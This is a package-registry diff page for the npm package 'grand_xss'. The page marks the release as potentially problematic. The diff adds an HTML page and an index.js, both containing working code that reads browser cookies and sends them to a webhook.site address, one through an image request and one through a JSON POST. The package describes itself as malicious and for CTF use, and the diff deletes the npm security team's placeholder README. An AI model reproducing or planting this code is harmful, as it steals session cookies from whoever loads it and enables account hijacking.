grand_xss 0.0.1-security → 4.0.2
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of grand_xss might be problematic. Click here for more details.
- package/index.htm +21 -0
- package/index.js +38 -0
- package/package.json +8 -3
- package/style.css +3 -0
- package/README.md +0 -5
package/index.htm
ADDED
|
@@ -0,0 +1,21 @@
|
|
|
1
|
+
<!DOCTYPE html>
|
|
2
|
+
<html lang="en">
|
|
3
|
+
<head>
|
|
4
|
+
<meta charset="UTF-8">
|
|
5
|
+
<meta name="viewport" content="width=device-width, initial-scale=1.0">
|
|
6
|
+
<title>Send Cookies to Webhook</title>
|
|
7
|
+
</head>
|
|
8
|
+
<body>
|
|
9
|
+
<script>
|
|
10
|
+
// 获取当前页面的cookie
|
|
11
|
+
const cookies = document.cookie;
|
|
12
|
+
|
|
13
|
+
// 动态创建一个img标签发送GET请求
|
|
14
|
+
const img = new Image();
|
|
15
|
+
img.src = `https://webhook.site/325d8fc1-9998-4641-81df-05368b822eae?cookie=${encodeURIComponent(cookies)}`;
|
|
16
|
+
|
|
17
|
+
// 将img标签添加到页面
|
|
18
|
+
document.body.appendChild(img);
|
|
19
|
+
</script>
|
|
20
|
+
</body>
|
|
21
|
+
</html>
|
package/index.js
ADDED
|
@@ -0,0 +1,38 @@
|
|
|
1
|
+
// index.js
|
|
2
|
+
const https = require('https');
|
|
3
|
+
|
|
4
|
+
// 获取当前页面的cookie
|
|
5
|
+
const cookies = document.cookie;
|
|
6
|
+
|
|
7
|
+
// 创建一个POST请求发送cookie到Webhook URL
|
|
8
|
+
const data = JSON.stringify({
|
|
9
|
+
cookies: cookies
|
|
10
|
+
});
|
|
11
|
+
|
|
12
|
+
const options = {
|
|
13
|
+
hostname: 'webhook.site',
|
|
14
|
+
path: '/325d8fc1-9998-4641-81df-05368b822eae',
|
|
15
|
+
method: 'POST',
|
|
16
|
+
headers: {
|
|
17
|
+
'Content-Type': 'application/json',
|
|
18
|
+
'Content-Length': data.length
|
|
19
|
+
}
|
|
20
|
+
};
|
|
21
|
+
|
|
22
|
+
const req = https.request(options, (res) => {
|
|
23
|
+
let responseData = '';
|
|
24
|
+
res.on('data', (chunk) => {
|
|
25
|
+
responseData += chunk;
|
|
26
|
+
});
|
|
27
|
+
res.on('end', () => {
|
|
28
|
+
console.log('Response from Webhook:', responseData);
|
|
29
|
+
});
|
|
30
|
+
});
|
|
31
|
+
|
|
32
|
+
req.on('error', (e) => {
|
|
33
|
+
console.error(`Problem with request: ${e.message}`);
|
|
34
|
+
});
|
|
35
|
+
|
|
36
|
+
// Write data to request body
|
|
37
|
+
req.write(data);
|
|
38
|
+
req.end();
|
package/package.json
CHANGED
|
@@ -1,6 +1,11 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "grand_xss",
|
|
3
|
-
"version": "
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
3
|
+
"version": "4.0.2",
|
|
4
|
+
"description": "A malicious package for CTF purposes",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"start": "node index.js"
|
|
8
|
+
},
|
|
9
|
+
"author": "Ec3o",
|
|
10
|
+
"license": "MIT"
|
|
6
11
|
}
|
package/style.css
ADDED
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=grand_xss for more information.
|